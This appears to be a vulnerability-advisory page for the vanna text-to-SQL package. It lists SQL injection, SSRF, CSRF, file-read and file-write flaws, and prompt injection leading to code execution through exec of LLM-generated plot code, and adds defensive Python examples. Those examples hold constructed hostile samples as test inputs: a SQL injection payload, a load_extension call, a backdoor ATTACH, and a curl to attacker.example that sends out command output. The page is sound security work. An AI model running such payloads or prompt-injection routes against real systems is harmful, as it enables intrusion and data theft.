vanna@0.7.6 vulnerabilities

Generate SQL queries from natural language

  • latest version

    2.0.2

  • first published

    2 years ago

  • latest version published

    1 month ago

  • licenses detected

  • Direct Vulnerabilities

    Known vulnerabilities in the vanna package. This does not include vulnerabilities belonging to this package’s dependencies.

    Vulnerability (severity marker: C = Critical, H = High, M = Medium) and vulnerable version range
    • M (Medium)
    SQL Injection

    vanna is a package that generates SQL queries from natural language.

    Affected versions of this package are vulnerable to SQL Injection via the ask function in the file vanna\legacy\base\base.py. An attacker can execute unauthorized SQL commands by supplying crafted input to the function.

    How to fix SQL Injection?

    There is no fixed version for vanna.

    Vulnerable versions: [0,) (all versions)
    • M (Medium)
    Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

    Affected versions of this package are vulnerable to Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') via the exec function in the /src/vanna/legacy file. An attacker can execute arbitrary commands by supplying crafted input remotely.

    How to fix Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')?

    There is no fixed version for vanna.

    Vulnerable versions: [0,) (all versions)
    • M (Medium)
    SQL Injection

    Affected versions of this package are vulnerable to SQL Injection via the remove_training_data function in the file bigquery_vector.py. An attacker can execute arbitrary SQL commands by supplying crafted input to the ID argument, which is interpolated into the statement rather than bound as a query parameter.

    How to fix SQL Injection?

    There is no fixed version for vanna.

    Vulnerable versions: [0,) (all versions)
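    The bug class in the remove_training_data entry above, shown as an added example (this is not vanna's code; the in-memory SQLite table, the row contents and the attacker-supplied id are constructed for the demonstration, and sqlite3 stands in for the BigQuery client). The unsafe function splices the id into the statement text; the hardened one binds it as a parameter, so the same payload deletes nothing.

```python
import sqlite3

# Constructed stand-in for the vector store: an in-memory SQLite table, not vanna's schema.
def make_store():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE training_data (id TEXT PRIMARY KEY, content TEXT)")
    conn.executemany(
        "INSERT INTO training_data VALUES (?, ?)",
        [("a1-sql", "SELECT * FROM orders"),
         ("b2-ddl", "CREATE TABLE orders (id INT, customer TEXT, total REAL)"),
         ("c3-doc", "orders.total is denominated in USD")],
    )
    conn.commit()
    return conn

def count_rows(conn):
    return conn.execute("SELECT COUNT(*) FROM training_data").fetchone()[0]

def remove_training_data_unsafe(conn, id):
    # The vulnerable pattern: the caller-controlled id becomes part of the SQL text,
    # so a quote inside it rewrites the WHERE clause.
    conn.execute(f"DELETE FROM training_data WHERE id = '{id}'")
    conn.commit()

def remove_training_data_safe(conn, id):
    # Hardened form: the id is a bound parameter and can never be parsed as SQL.
    cur = conn.execute("DELETE FROM training_data WHERE id = ?", (id,))
    conn.commit()
    return cur.rowcount   # number of rows actually deleted

PAYLOAD = "nope' OR '1'='1"   # constructed attacker-supplied id

def demo():
    """Returns (rows left after unsafe delete, rows left after safe delete, rows safe delete removed)."""
    unsafe = make_store()
    remove_training_data_unsafe(unsafe, PAYLOAD)   # runs: ... WHERE id = 'nope' OR '1'='1'
    safe = make_store()
    deleted = remove_training_data_safe(safe, PAYLOAD)
    return count_rows(unsafe), count_rows(safe), deleted

if __name__ == "__main__":
    print(demo())   # (0, 3, 0): the unsafe version wiped the whole table
```

    With the google-cloud-bigquery client the same fix is a named parameter in the SQL (`WHERE id = @id`) supplied through `bigquery.ScalarQueryParameter("id", "STRING", id)` in a `QueryJobConfig(query_parameters=[...])`; string formatting into the query text is the defect regardless of backend.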
    • M (Medium)
    Server-side Request Forgery (SSRF)

    Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) via the run_sql function. An attacker can reach internal resources or services from the vanna host by sending crafted requests remotely.

    How to fix Server-side Request Forgery (SSRF)?

    There is no fixed version for vanna.

    Vulnerable versions: [0,) (all versions)
    • M (Medium)
    SQL Injection

    Affected versions of this package are vulnerable to SQL Injection via the update_sql function. An attacker can execute arbitrary SQL commands by supplying crafted input remotely.

    How to fix SQL Injection?

    There is no fixed version for vanna.

    Vulnerable versions: [0,) (all versions)
    • M (Medium)
    Cross-site Request Forgery (CSRF)

    Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) in the run_sql() function, exposed via the /api/v0/run_sql endpoint. An attacker who gets a victim's browser to send a forged request to this endpoint can alter or delete (but not read) data by including SQL commands in the request. This matters wherever the endpoint is reachable from a user's browser even though it was never meant to be exposed.

    How to fix Cross-site Request Forgery (CSRF)?

    There is no fixed version for vanna.

    Vulnerable versions: [0,) (all versions)
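    One way to gate a state-changing JSON endpoint such as /api/v0/run_sql against the forged requests described above, as an added example (not vanna's code). It assumes the UI is served from a single known origin and that legitimate callers are the app's own XHR/fetch code; the sample requests are constructed to show what a hidden auto-submitting form on an attacker's page produces in a current browser and in an older one without fetch metadata.

```python
from urllib.parse import urlsplit

# Origin the vanna UI is served from: assumed for this example.
ALLOWED_ORIGINS = {"https://vanna.internal.example"}

def check_state_changing_request(method, headers, allowed_origins=ALLOWED_ORIGINS):
    """Return (allowed, reason) for a request to a SQL-executing endpoint.

    Checks, in order: POST only; Fetch Metadata; Origin (or Referer as fallback);
    then two headers a plain cross-site form submission cannot set without a CORS
    preflight, which the server never grants.
    """
    h = {k.lower(): v for k, v in headers.items()}
    if method.upper() != "POST":
        return False, "only POST accepted"
    site = h.get("sec-fetch-site")
    if site in ("cross-site", "same-site"):          # same-site = sibling subdomain; still not us
        return False, f"Sec-Fetch-Site={site}"
    origin = h.get("origin")
    if origin is None and "referer" in h:
        parts = urlsplit(h["referer"])
        origin = f"{parts.scheme}://{parts.netloc}"
    if origin is None:
        return False, "no Origin or Referer on a state-changing request"
    if origin not in allowed_origins:
        return False, f"origin {origin} not allowed"
    if h.get("x-requested-with") != "XMLHttpRequest":
        return False, "missing X-Requested-With header"
    if h.get("content-type", "").split(";")[0].strip().lower() != "application/json":
        return False, "body is not application/json"
    return True, "ok"

# Constructed sample requests.
LEGIT = ("POST", {"Origin": "https://vanna.internal.example", "Sec-Fetch-Site": "same-origin",
                  "X-Requested-With": "XMLHttpRequest", "Content-Type": "application/json"})
# Hidden form on attacker.example auto-submitting to /api/v0/run_sql, current browser:
CSRF_FORM = ("POST", {"Origin": "https://attacker.example", "Sec-Fetch-Site": "cross-site",
                      "Content-Type": "application/x-www-form-urlencoded"})
# Same attack from an older browser that sends no Fetch Metadata, only a Referer:
CSRF_LEGACY = ("POST", {"Referer": "https://attacker.example/pwn.html",
                        "Content-Type": "text/plain"})

if __name__ == "__main__":
    for name, req in (("legit", LEGIT), ("csrf_form", CSRF_FORM), ("csrf_legacy", CSRF_LEGACY)):
        print(name, check_state_changing_request(*req))
```

    In a Flask app this runs from an `@app.before_request` hook that calls `abort(403)` on a False result for the API paths. It complements, not replaces, the other controls: bind the app to localhost if it is not meant to be exposed, mark the session cookie SameSite=Strict, and keep the endpoint behind authentication.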
    • H (High)
    SQL Injection

    Affected versions of this package are vulnerable to SQL Injection by injecting a series of PUT and COPY statements as raw SQL using the "Manually Fix" feature in the Snowflake database integration. The run_sql_snowflake() function executes those statements on the database without sanitization. Because Snowflake's PUT command uploads files from the machine running the Snowflake client to a stage, and COPY INTO then loads them into a table the attacker can query, this lets an attacker read arbitrary local files on the host running vanna.

    How to fix SQL Injection?

    There is no fixed version for vanna.

    Vulnerable versions: [0,) (all versions)
    • M (Medium)
    SQL Injection

    Affected versions of this package are vulnerable to SQL Injection through the pg_read_file function. An attacker who can get a crafted query executed against the PostgreSQL backend can read arbitrary local files on the database server: pg_read_file runs inside the server process, so the readable files are those accessible to the PostgreSQL service account.

    Note

    By default pg_read_file() is restricted to superusers, but other roles can be granted EXECUTE on this function, so check the grants on the role vanna connects with.

    How to fix SQL Injection?

    There is no fixed version for vanna.

    Vulnerable versions: [0,) (all versions)
    • M (Medium)
    SQL Injection

    Affected versions of this package are vulnerable to SQL Injection through the integration of DuckDB with Flask Web APIs. An attacker can manipulate SQL training data so that the generated queries write arbitrary files (DuckDB statements such as COPY ... TO can do this, and DuckDB runs in-process, so the files land on the host running the vanna app), potentially leading to unauthorized command execution or the creation of backdoors.

    How to fix SQL Injection?

    There is no fixed version for vanna.

    Vulnerable versions: [0,) (all versions)
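    The Snowflake PUT/COPY, pg_read_file, DuckDB file-write and update_sql entries above share one root cause: model-generated or user-edited SQL reaches the database with whatever privileges the app's connection has. The mitigation that does not depend on parsing the SQL is to run it under a connection that can only read. The example below is added here and is not vanna's code: it demonstrates the principle in-process with SQLite's authorizer hook, which vetoes every statement type except SELECT and blocks file- and code-loading SQL functions; the schema, rows and generated statements are constructed. In production the equivalent is a database role granted only SELECT (and no EXECUTE on functions like pg_read_file, no stage or file privileges in Snowflake).

```python
import sqlite3

# SQL functions that turn a "harmless" SELECT into file or code access.
DANGEROUS_FUNCTIONS = {"load_extension", "readfile", "writefile", "edit"}

def read_only_authorizer(action, arg1, arg2, dbname, source):
    """SQLite authorizer callback: allow reads and ordinary functions, deny everything else."""
    if action in (sqlite3.SQLITE_SELECT, sqlite3.SQLITE_READ):
        return sqlite3.SQLITE_OK
    if action == sqlite3.SQLITE_FUNCTION:
        # For SQLITE_FUNCTION the function name is passed in arg2.
        if (arg2 or "").lower() in DANGEROUS_FUNCTIONS:
            return sqlite3.SQLITE_DENY
        return sqlite3.SQLITE_OK
    # INSERT/UPDATE/DELETE, DDL, PRAGMA, ATTACH, transactions: denied at prepare time.
    return sqlite3.SQLITE_DENY

def make_db():
    """Constructed sample data; the authorizer is installed before any generated SQL runs."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE orders (id INTEGER PRIMARY KEY, customer TEXT, total REAL)")
    conn.executemany("INSERT INTO orders VALUES (?, ?, ?)",
                     [(1, "acme", 10.0), (2, "globex", 25.5), (3, "acme", 4.5)])
    conn.commit()
    conn.set_authorizer(read_only_authorizer)
    return conn

def run_generated_sql(conn, sql):
    """Execute one generated statement. Returns ("ok", rows) or ("denied", error message)."""
    try:
        # sqlite3.execute refuses stacked statements; the authorizer vetoes non-reads.
        return "ok", conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return "denied", str(exc)

# Constructed examples of what an LLM or a "Manually Fix" edit might hand to run_sql.
GENERATED = [
    "SELECT customer, SUM(total) FROM orders GROUP BY customer ORDER BY customer",
    "DELETE FROM orders",                                  # data destruction via update_sql
    "SELECT load_extension('/tmp/evil.so')",               # native code loading via a function
    "ATTACH DATABASE '/var/www/app/backdoor.db' AS x",     # file creation, like DuckDB COPY ... TO
]

def demo():
    """Returns (outcome per generated statement, rows still in orders afterwards)."""
    db = make_db()
    outcomes = [run_generated_sql(db, sql)[0] for sql in GENERATED]
    remaining = run_generated_sql(db, "SELECT COUNT(*) FROM orders")[1][0][0]
    return outcomes, remaining

if __name__ == "__main__":
    print(demo())   # (['ok', 'denied', 'denied', 'denied'], 3)
```

    The authorizer decides at statement-preparation time, so the denied statements never execute at all; no rows are touched and no file is created. Pair this with the single-statement rule and, for PostgreSQL, `SET default_transaction_read_only = on` on the session, and the injection classes above degrade to a read of data the user could already query.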
    • C (Critical)
    Code Injection

    Affected versions of this package are vulnerable to Code Injection in the file src/vanna/base/base.py, where exec runs the plotly_code that the LLM produced in generate_plotly_code. An attacker can achieve remote code execution on the app's backend server via prompt injection and gain full control of the server.

    How to fix Code Injection?

    There is no fixed version for vanna.

    Vulnerable versions: [0,) (all versions)
    • H (High)
    Improper Input Validation

    Affected versions of this package are vulnerable to Improper Input Validation allowing prompt injection via the ask method when the visualize parameter is set to True. An attacker can execute arbitrary code by injecting malicious input into the prompt. This is only exploitable when visualize is enabled, which is the default.

    How to fix Improper Input Validation?

    There is no fixed version for vanna.

    Vulnerable versions: [0,) (all versions)
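    Both the Code Injection entry and the Improper Input Validation entry above come down to exec of a code string the model wrote after reading attacker-influenced text. The example below is added here and is not vanna's code. It assumes a contract for the generated snippet (it may only use the names px, go and df and must assign the figure to fig), validates the snippet's AST against an allowlist, and only then executes it with an empty builtins namespace and the plotly aliases pre-bound. The three injected snippets are constructed to show the usual escape routes (an extra import, the __import__ builtin, dunder attribute chains) being rejected; a stub object stands in for plotly.express so the example runs without plotly installed.

```python
import ast

# Contract for the generated snippet (assumed for this example).
ALLOWED_IMPORTS = {"plotly.express": "px", "plotly.graph_objects": "go"}
READABLE_NAMES = {"px", "go", "df", "fig"}
ALLOWED_NODES = (
    ast.Module, ast.Import, ast.alias, ast.Expr, ast.Assign, ast.Call, ast.keyword,
    ast.Name, ast.Attribute, ast.Constant, ast.List, ast.Tuple, ast.Dict,
    ast.Subscript, ast.Slice, ast.BinOp, ast.UnaryOp, ast.Add, ast.Sub, ast.Mult,
    ast.Div, ast.USub, ast.Load, ast.Store,
)
if hasattr(ast, "Index"):            # Python < 3.9 wraps subscript indices in ast.Index
    ALLOWED_NODES += (ast.Index,)

def validate_plot_code(code):
    """Return (ok, reason) after checking every AST node against the allowlist."""
    try:
        tree = ast.parse(code, mode="exec")
    except SyntaxError as exc:
        return False, f"syntax error: {exc.msg}"
    assigns_fig = False
    for node in ast.walk(tree):
        if not isinstance(node, ALLOWED_NODES):      # no lambdas, comprehensions, f-strings, ...
            return False, f"disallowed syntax: {type(node).__name__}"
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name not in ALLOWED_IMPORTS or ALLOWED_IMPORTS[alias.name] != alias.asname:
                    return False, f"disallowed import: {alias.name}"
        elif isinstance(node, ast.Attribute) and node.attr.startswith("_"):
            return False, f"private attribute: {node.attr}"   # blocks __class__/__subclasses__ chains
        elif isinstance(node, ast.Name):
            if isinstance(node.ctx, ast.Store):
                if node.id != "fig":
                    return False, f"may only assign to fig, not {node.id}"
                assigns_fig = True
            elif node.id not in READABLE_NAMES:
                return False, f"unknown name: {node.id}"     # catches __import__, open, eval, os ...
    if not assigns_fig:
        return False, "snippet never assigns fig"
    return True, "ok"

def run_plot_code(code, df, px=None, go=None):
    """Validate, then execute with no builtins and only the pre-bound plotly aliases."""
    ok, reason = validate_plot_code(code)
    if not ok:
        raise ValueError(f"rejected generated plot code: {reason}")
    tree = ast.parse(code, mode="exec")
    # The only imports that survive validation are the plotly aliases bound below, so
    # drop them; with no __import__ builtin they could not run anyway.
    tree.body = [n for n in tree.body if not isinstance(n, ast.Import)]
    env = {"__builtins__": {}, "df": df, "px": px, "go": go}
    exec(compile(tree, "<generated-plot>", "exec"), env)
    return env["fig"]

# Constructed samples of what generate_plotly_code might return.
BENIGN = """import plotly.express as px
fig = px.bar(df, x='customer', y='total', title='Total by customer')
"""
INJECTED = """import plotly.express as px
import os
os.system('curl https://attacker.example/x?d=$(id)')
fig = px.bar(df, x='customer', y='total')
"""
INJECTED_NO_IMPORT = "fig = __import__('os').popen('id').read()\n"
INJECTED_DUNDER = "fig = ().__class__.__base__.__subclasses__()\n"

class _StubPX:
    """Stand-in for plotly.express so the example runs without plotly installed."""
    def bar(self, df, **kwargs):
        return ("bar", len(df), kwargs)

def demo():
    """Returns (figure built from the benign snippet, rejection reason for each injected one)."""
    fig = run_plot_code(BENIGN, df=[{"customer": "acme", "total": 14.5}], px=_StubPX())
    rejected = [validate_plot_code(c)[1] for c in (INJECTED, INJECTED_NO_IMPORT, INJECTED_DUNDER)]
    return fig, rejected

if __name__ == "__main__":
    print(demo())
```

    The allowlist is deliberately narrow: the model's job is one plotly call and optional layout tweaks, and anything outside that shape is a reason to discard the snippet rather than widen the list. The stronger fix is structural: have the model return a chart specification (type, x, y, title) as JSON and build the figure in your own code, so there is no exec at all and prompt injection can at worst produce a strange chart.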